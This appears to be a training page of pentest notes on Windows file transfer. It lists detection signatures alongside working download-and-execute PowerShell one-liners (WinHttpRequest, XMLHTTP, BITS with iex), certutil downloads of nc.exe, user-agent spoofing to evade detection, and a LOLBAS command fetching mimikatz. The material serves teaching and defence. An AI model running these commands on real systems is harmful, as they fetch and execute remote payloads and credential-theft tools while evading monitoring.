File Transfer Detection & Evasion Techniques

Detection Methods

1. Command Line Detection

Methodology: Implement whitelisting over blacklisting
Key Point: Whitelisting is more time-consuming but provides better security
Best Practice: Focus on detecting unusual command-line patterns

2. HTTP Protocol Analysis

Focus Area: User Agent String Detection
Implementation Steps:
1. Create whitelist of legitimate user agents
2. Include common system processes
3. Document legitimate services (Windows Update, AV)
4. Configure SIEM for user agent monitoring

Common Transfer Methods & Detection Signatures

1. PowerShell Invoke-WebRequest

# Download Command
Invoke-WebRequest http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"
Invoke-RestMethod http://10.10.10.32/nc.exe -OutFile "C:\Users\Public\nc.exe"

# Detection Signature
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.14393.0

2. WinHttpRequest

# Download Command
$h=new-object -com WinHttp.WinHttpRequest.5.1
$h.open('GET','http://10.10.10.32/nc.exe',$false)
$h.send()
iex $h.ResponseText

# Detection Signature
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

3. Msxml2.XMLHTTP

# Download Command
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://10.10.10.32/nc.exe',$false)
$h.send()
iex $h.responseText

# Detection Signature
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)

4. Certutil

# Download Commands
certutil -urlcache -split -f http://10.10.10.32/nc.exe
certutil -verifyctl -split -f http://10.10.10.32/nc.exe

# Detection Signature
User-Agent: Microsoft-CryptoAPI/10.0

5. BITS Transfer

# Download Command
Import-Module bitstransfer
Start-BitsTransfer 'http://10.10.10.32/nc.exe' $env:temp\t
$r=gc $env:temp\t
rm $env:temp\t
iex $r

# Detection Signature
User-Agent: Microsoft BITS/7.8

Evasion Techniques

1. User Agent Manipulation

Listing Available User Agents

[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl

Common User Agent Strings

Internet Explorer:

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT; Windows NT 10.0; en-US)

Firefox:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) Gecko/20100401 Firefox/4.0

Chrome:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/534.6 (KHTML, like Gecko) Chrome/7.0.500.0 Safari/534.6

Opera:

Opera/9.70 (Windows NT; Windows NT 10.0; en-US) Presto/2.2.1

Safari:

Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16

Custom User Agent Implementation

# Set Chrome User Agent
$UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome
Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"

2. LOLBAS (Living Off The Land Binaries)

Purpose: Bypass application whitelisting
Example Using GfxDownloadWrapper.exe:

GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"

Detection & Defense Methodology Checklist

Immediate Actions

Implement user agent whitelisting
Configure SIEM for anomaly detection
Document legitimate file transfer patterns

Regular Monitoring

Review unusual user agent strings
Monitor for known malicious transfer patterns
Check for abuse of legitimate binaries (LOLBAS)

Investigation Steps

Identify suspicious user agents
Analyze transfer patterns
Cross-reference with whitelist
Document new threat patterns

Additional Resources

LOLBAS Project (Windows): https://lolbas-project.github.io/
GTFOBins (Linux): https://gtfobins.github.io/

PreviousAdvanced File Transfer Techniques NextShells & Payloads: Shell Overview

hashtagDetection Methods

hashtag1. Command Line Detection

hashtag2. HTTP Protocol Analysis

hashtagCommon Transfer Methods & Detection Signatures

hashtag1. PowerShell Invoke-WebRequest

hashtag2. WinHttpRequest

hashtag3. Msxml2.XMLHTTP

hashtag4. Certutil

hashtag5. BITS Transfer

hashtagEvasion Techniques

hashtag1. User Agent Manipulation

hashtagListing Available User Agents

hashtagCommon User Agent Strings

hashtagCustom User Agent Implementation

hashtag2. LOLBAS (Living Off The Land Binaries)

hashtagDetection & Defense Methodology Checklist

hashtagImmediate Actions

hashtagRegular Monitoring

hashtagInvestigation Steps

hashtagAdditional Resources

Detection Methods

1. Command Line Detection

2. HTTP Protocol Analysis

Common Transfer Methods & Detection Signatures

1. PowerShell Invoke-WebRequest

2. WinHttpRequest

3. Msxml2.XMLHTTP

4. Certutil

5. BITS Transfer

Evasion Techniques

1. User Agent Manipulation

Listing Available User Agents

Common User Agent Strings

Custom User Agent Implementation

2. LOLBAS (Living Off The Land Binaries)

Detection & Defense Methodology Checklist

Immediate Actions

Regular Monitoring

Investigation Steps

Additional Resources